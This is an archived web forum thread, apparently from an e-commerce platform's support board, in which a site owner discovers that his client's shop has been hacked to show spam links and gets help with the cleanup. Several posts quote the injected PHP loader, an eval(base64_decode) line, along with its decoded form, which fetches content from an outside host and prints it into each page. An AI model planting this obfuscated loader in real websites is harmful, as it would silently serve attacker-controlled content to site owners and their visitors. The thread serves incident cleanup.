wmsgroup Posted June 22, 2010 Posted June 22, 2010 Well, long story short, I got an email from my client who says a customer noticed his site was down. I went and checked it out and yup, sure enough, it was. There were a few errors listed on the screen and I can't recall what they were exactly. I did a lot of Googling and finally got it back up. EXCEPT... the main portion of the pages including the home page are dropped down and out of place. The site is here. This was partly because I had to find the add-on code in the includes/header.php file that was in there before and I messed up the tables I guess. Why would something like that happen? Is it possible for code to be stripped from a page because of a security addition or server upgrade? I'm just confused and have a 3/4 of the way fixed site.
dlcmpls Posted June 22, 2010 Posted June 22, 2010 Well, long story short, I got an email from my client who says a customer noticed his site was down. I went and checked it out and yup, sure enough, it was. There were a few errors listed on the screen and I can't recall what they were exactly. I did a lot of Googling and finally got it back up. EXCEPT... the main portion of the pages including the home page are dropped down and out of place. The site is here. This was partly because I had to find the add-on code in the includes/header.php file that was in there before and I messed up the tables I guess. Why would something like that happen? Is it possible for code to be stripped from a page because of a security addition or server upgrade? I'm just confused and have a 3/4 of the way fixed site. It's unlikely that code was stripped by the server or by an upgrade. More likely is that you made some unintentional change when you edited the heaader.php files. Do you have a backup of that file that you can reinstate and test?
germ Posted June 22, 2010 Posted June 22, 2010 I believe site security has been compromised.... :'( Look at the page source. There are around 500 what appear to be SPAM links at the end of the page. :o If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
wmsgroup Posted June 22, 2010 Author Posted June 22, 2010 It's unlikely that code was stripped by the server or by an upgrade. More likely is that you made some unintentional change when you edited the heaader.php files. Do you have a backup of that file that you can reinstate and test? I may have a backup on another machine, but the funny thing is that I haven't touched the site in well over a year and I do know it has been functioning all this time. But, thank you for the advice. I will see what I have backed up and go from there.
wmsgroup Posted June 22, 2010 Author Posted June 22, 2010 I believe site security has been compromised.... :'( Look at the page source. There are around 500 what appear to be SPAM links at the end of the page. :o Oh crap! What can I do and how could this have happened?
germ Posted June 22, 2010 Posted June 22, 2010 How to Secure Your Site If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
wmsgroup Posted June 22, 2010 Author Posted June 22, 2010 How to Secure Your Site Thanks germ, I just installed FWR Security Pro. Should there be code stuck in the header file that is injecting this spam or could it be coming from somewhere else?
germ Posted June 22, 2010 Posted June 22, 2010 I'm guessing the rogue code will probably look something like described here After looking at a few pages in the site I can only see the trash on the index page. Look at the bottom of it. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
wmsgroup Posted June 22, 2010 Author Posted June 22, 2010 Thanks germ, I just installed FWR Security Pro. Should there be code stuck in the header file that is injecting this spam or could it be coming from somewhere else? I found the following code in virtually every page :'( <?php eval(base64_decode('aWYgKGV4dGVuc2lvbl9sb2FkZWQoImN1cmwiKSkgeyANCiRjaCA9IGN1cmxfaW5pdCgpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzMCk7IA0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgDQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAiaHR0cDovL2VsdW1laW5jLmNvbS9tb2R1bGVzL21vZF9zZWFyY2gvbGljZW5zZS50eHQiKTsgDQokciA9IGN1cmxfZXhlYygkY2gpOyANCmN1cmxfY2xvc2UoJGNoKTsgDQp9IGVsc2UgeyAkcj1pbXBsb2RlKCIiLGZpbGUoImh0dHA6Ly9lbHVtZWluYy5jb20vbW9kdWxlcy9tb2Rfc2VhcmNoL2xpY2Vuc2UudHh0IikpOyB9IA0KaWYoJHIpIHByaW50ICRyOw==')); ?> Which decodes to this if (extension_loaded("curl")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, "http://elumeinc.com/modules/mod_search/license.txt"); $r = curl_exec($ch); curl_close($ch); } else { $r=implode("",file("http://elumeinc.com/modules/mod_search/license.txt")); } if($r) print $r; I copied the url above, pasted it into my browser and voila: http://elumeinc.com/modules/mod_search/license.txt Wow, what did I get myself into? :blush:
germ Posted June 22, 2010 Posted June 22, 2010 Your admin isn't protected by a .htaccess file. My first guess is you're a victim of the vulnerablities in the admin discussed in the first post in the "How to Secure Your Site" thread. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
wmsgroup Posted June 22, 2010 Author Posted June 22, 2010 I found it in application_top, deleted and I'm seeing less of it on the other pages. That would be too easy though, so I'll keep digging. This is fun :P
~Kira Posted July 8, 2010 Posted July 8, 2010 I found the following code in virtually every page :'( <?php eval(base64_decode('aWYgKGV4dGVuc2lvbl9sb2FkZWQoImN1cmwiKSkgeyANCiRjaCA9IGN1cmxfaW5pdCgpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCAzMCk7IA0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsgDQpjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAiaHR0cDovL2VsdW1laW5jLmNvbS9tb2R1bGVzL21vZF9zZWFyY2gvbGljZW5zZS50eHQiKTsgDQokciA9IGN1cmxfZXhlYygkY2gpOyANCmN1cmxfY2xvc2UoJGNoKTsgDQp9IGVsc2UgeyAkcj1pbXBsb2RlKCIiLGZpbGUoImh0dHA6Ly9lbHVtZWluYy5jb20vbW9kdWxlcy9tb2Rfc2VhcmNoL2xpY2Vuc2UudHh0IikpOyB9IA0KaWYoJHIpIHByaW50ICRyOw==')); ?> Which decodes to this if (extension_loaded("curl")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, "http://elumeinc.com/modules/mod_search/license.txt"); $r = curl_exec($ch); curl_close($ch); } else { $r=implode("",file("http://elumeinc.com/modules/mod_search/license.txt")); } if($r) print $r; I copied the url above, pasted it into my browser and voila: http://elumeinc.com/modules/mod_search/license.txt Wow, what did I get myself into? :blush: I just found 2 of these at the bottom of a client's index page. I know the eval decode is not a good thing as I just unhacked another shop a couple months ago with the same code. Anyway this also goes to elumeinc.com --- can you tell me what's in that file? My workstation is down and I don't want to open the page. Thanks !!! ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆ ☆
germ Posted July 8, 2010 Posted July 8, 2010 I found it in application_top, deleted and I'm seeing less of it on the other pages. That would be too easy though, so I'll keep digging. This is fun :P Look at your page cache in google. The spam is back,,, :'( If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there >
Recommended Posts
Archived
This topic is now archived and is closed to further replies.